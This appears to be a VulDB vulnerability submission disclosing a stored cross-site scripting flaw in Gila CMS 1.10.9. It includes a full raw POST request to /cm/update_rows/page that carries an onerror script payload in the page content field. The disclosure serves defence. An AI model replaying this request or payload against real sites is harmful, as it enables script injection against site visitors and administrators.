| Title | Gila CMS 1.10.9 Stored Cross-Site Scripting |
|---|
| Description | In Gila CMS version 1.10.9, an authenticated user can exploit a Cross-Site Scripting (XSS) vulnerability by inserting a malicious script payload. This can be done by intercepting a POST request to the URL /cm/update_rows/page?id=<ID>. By modifying the "content" field in the intercepted request, it is possible to inject and execute a malicious script.
----- [request] -----
POST /cm/update_rows/page?id=2 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------56708877833819783853068327471
Content-Length: 681
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/admin/content/page
Cookie: PHPSESSID=akgkimcivicdds3mvebk00fl70; GSESSIONID=16wcb3jbe0v3bhcbd2mjtlx9a38zsmr9llczvz4rflpr32enfs
Sec-GPC: 1
-----------------------------56708877833819783853068327471
Content-Disposition: form-data; name="title"
Teste 01
-----------------------------56708877833819783853068327471
Content-Disposition: form-data; name="slug"
-----------------------------56708877833819783853068327471
Content-Disposition: form-data; name="publish"
1
-----------------------------56708877833819783853068327471
Content-Disposition: form-data; name="template"
-----------------------------56708877833819783853068327471
Content-Disposition: form-data; name="content"
<img src=1 href=1 onerror="javascript:alert(1)"></img>
-----------------------------56708877833819783853068327471--
----------------------------------------------------------------------------------------------
|
|---|
| User | xMirandax (UID 72454) |
|---|
| Submission | 08/01/2024 11:21 PM (2 years ago) |
|---|
| Moderation | 08/10/2024 09:55 AM (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 274114 [Gila CMS 1.10.9 HTTP POST Request page?id=2 content cross site scripting] |
|---|
| Points | 17 |
|---|